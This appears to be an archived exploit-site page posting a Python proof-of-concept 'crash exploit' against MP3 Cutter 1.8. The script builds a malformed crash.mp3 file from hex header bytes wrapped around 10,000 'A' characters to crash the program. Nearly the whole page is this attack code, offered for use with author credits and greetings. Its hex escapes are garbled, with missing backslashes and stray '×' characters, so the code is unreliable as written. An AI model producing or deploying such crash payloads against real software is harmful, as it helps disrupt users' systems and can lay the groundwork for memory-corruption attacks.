<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>MP3 Cutter 1.8 Crash Exploit</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>============================
MP3 Cutter 1.8 Crash Exploit
============================

##########################################################&quot;
## Legion of Xtremers &amp; Hackers Garage ##
## (www.loxian.co.cc) (www.garage4hackers.com) ##
## MP3 Cutter 1.8 Crash Exploit
## http://www.aivsoft.com/downloads/mp3cutter/download.html
## Author: Prashant a.k.a t3rm!n4t0r
## c0ntact: happyterminator@gmail.com
##
## Greetz to: vinnu, b0nd, fb1h2s, Anarki, Nikhil, D4RK3ST ##
##
&quot;#########################################################&quot;

#exploit.py
#MP3 cutter Crash Exploit

print &quot; MP3 Cutter Crash Exploit ( mp3 file ) n&quot;

header1 = (
&quot;x3Cx41×53x58×20x56×45x52×53x49×4Fx4Ex3Dx22×33&quot;
&quot;x2Ex30×22x3Ex0Ax0Ax3Cx45×4Ex54×52x59×3Ex3Cx54&quot;
&quot;x49×54x4Cx45×3Ex65×78x70×6Cx6Fx69×74x3Cx2Fx54&quot;
&quot;x49×54x4Cx45×3Ex0Ax3Cx52×45x46×20x48×52x45×46&quot;
&quot;x3Dx22&quot;
)

header2 = (
&quot;x2Ex61×73x66×22x2Fx3Ex0Ax3Cx2Fx45×4Ex54×52x59&quot;
&quot;x3Ex3Cx2Fx41×53x58×3E&quot;
)

crash = &quot;x41&quot; * 10000

exploit = header1 + crash + header2

try:
out_file = open(&quot;crash.mp3&quot;,’w')
out_file.write(exploit)
out_file.close()
raw_input(&quot;nExploit file created!n&quot;)
except:
print &quot;Error&quot;

# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-07-09]</pre><script type=’text/javascript’>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));</script><script type=’text/javascript’>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
Source: http://inj3ct0r.com/exploits/13253